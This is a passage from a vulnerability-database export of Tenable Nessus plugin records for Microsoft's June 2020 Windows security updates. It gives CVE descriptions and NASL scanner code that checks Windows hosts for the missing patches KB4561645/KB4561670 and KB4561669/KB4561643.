Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. 
(CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. 
An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561645: Windows Server 2008 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUN_4561670.NASL", "href": "https://www.tenable.com/plugins/nessus/137263", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137263);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1230\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561645\");\n script_xref(name:\"MSKB\", value:\"4561670\");\n script_xref(name:\"MSFT\", value:\"MS20-4561645\");\n script_xref(name:\"MSFT\", value:\"MS20-4561670\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561645: Windows Server 2008 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561645\nor cumulative update 4561670. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. 
An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. 
An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\");\n # https://support.microsoft.com/en-us/help/4561645/windows-server-2008-update-kb4561645\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ba639f1\");\n # https://support.microsoft.com/en-us/help/4561670/windows-server-2008-update-kb4561670\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79b91630\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561645 or Cumulative Update KB4561670.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1236\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This 
script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561670',\n '4561645'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561670, 4561645])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:28", "description": "The remote Windows host is missing security update 4561669 or cumulative update 4561643. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. 
(CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561669: Windows 7 and Windows Server 2008 R2 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561643.NASL", "href": "https://www.tenable.com/plugins/nessus/137260", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137260);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561669\");\n script_xref(name:\"MSKB\", value:\"4561643\");\n script_xref(name:\"MSFT\", value:\"MS20-4561669\");\n script_xref(name:\"MSFT\", value:\"MS20-4561643\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561669: Windows 7 and Windows Server 2008 R2 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561669\nor cumulative update 4561643. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. 
(CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. 
